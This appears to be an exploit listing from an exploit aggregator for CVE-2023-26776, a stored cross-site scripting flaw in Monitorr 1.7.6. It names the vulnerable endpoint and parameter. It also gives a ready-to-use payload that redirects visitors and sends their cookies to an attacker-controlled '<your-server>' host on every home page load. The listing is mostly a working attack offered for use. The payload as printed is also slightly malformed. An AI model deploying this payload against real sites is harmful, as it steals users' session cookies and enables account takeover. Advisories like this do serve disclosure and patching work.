Exploit for Monitorr 1.7.6 Cross Site Scripting CVE-2023-26776

Name: Exploit for Monitorr 1.7.6 Cross Site Scripting CVE-2023-26776
Rating: 5 (104 reviews)

2023-04-05 | CVSS 6.5

## https://sploitus.com/exploit?id=PACKETSTORM:171705
# Exploit Title: Monitorr v1.7.6 - Cross Site Scripting  
# CVE: CVE-2023-26776  
# Exploit Author: Achuth V P (retrymp3)  
# Date: February 09, 2023  
# Vendor Homepage: https://github.com/Monitorr/  
# Software Link: https://github.com/Monitorr/Monitorr  
# Tested on: Ubuntu  
# Version: v1.7.6  
# Exploit Description: Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.  
  
Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>  
The injected script tag is executed everytime the home page is loaded.